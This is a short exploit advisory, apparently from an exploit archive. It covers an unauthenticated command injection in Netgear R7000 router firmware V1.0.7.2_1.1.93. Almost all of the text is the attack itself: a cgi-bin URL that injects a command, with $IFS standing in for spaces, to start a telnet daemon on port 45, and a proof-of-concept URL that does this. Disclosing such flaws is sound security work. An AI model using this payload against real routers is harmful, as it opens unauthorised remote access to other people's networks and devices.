Netgear R7000 Command Injection
Posted on 09 December 2016
# Exploit Title: Netgear R7000 - Command Injection # Date: 6-12-2016 # Exploit Author: Acew0rm # Contact: https://twitter.com/Acew0rm1 # Vendor Homepage: https://www.netgear.com/ # Category: Hardware # Version: V1.0.7.2_1.1.93 -Vulnerability An unauthenticated user can inject commands threw http://RouterIP/cgi-bin/;COMMAND. -Proof Of Concept http://RouterIP/;telnetd$IFS-p$IFS'45' will open telnet on port 45.